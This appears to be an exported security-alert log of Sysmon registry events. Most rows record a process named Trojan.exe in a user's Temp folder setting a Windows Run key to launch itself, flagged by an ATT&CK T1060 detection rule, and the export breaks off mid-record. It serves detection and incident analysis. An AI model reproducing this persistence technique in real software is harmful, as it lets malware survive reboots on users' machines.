HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:05.502"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:17.598",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:04.486 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:04.498232500Z"",""eventRecordID"":""1450"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:04.486\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:04.486"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:15.614",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:03.471 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:03.473277800Z"",""eventRecordID"":""1449"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:03.471\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:03.471"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:15.598",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:02.455 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:02.478432800Z"",""eventRecordID"":""1448"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:02.455\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:02.455"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:14.599",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:01.408 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:01.410314100Z"",""eventRecordID"":""1446"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:01.408\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:01.408"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:14.271",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:00.393 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:00.400839400Z"",""eventRecordID"":""1444"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:00.393\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:00.393"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:14.193",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:59.363 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:59.366387700Z"",""eventRecordID"":""1442"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:59.363\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:59.363"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:11.460",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:58.346 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:58.348527400Z"",""eventRecordID"":""1440"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:58.346\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:58.346"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:10.458",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:57.330 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:57.342683800Z"",""eventRecordID"":""1439"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:57.330\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:57.330"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:09.442",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:56.314 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:56.316381300Z"",""eventRecordID"":""1438"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:56.314\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:56.314"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:08.411",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:55.283 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:55.296802000Z"",""eventRecordID"":""1436"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:55.283\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:55.283"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:07.385",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:54.252 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:54.255475600Z"",""eventRecordID"":""1435"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:54.252\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 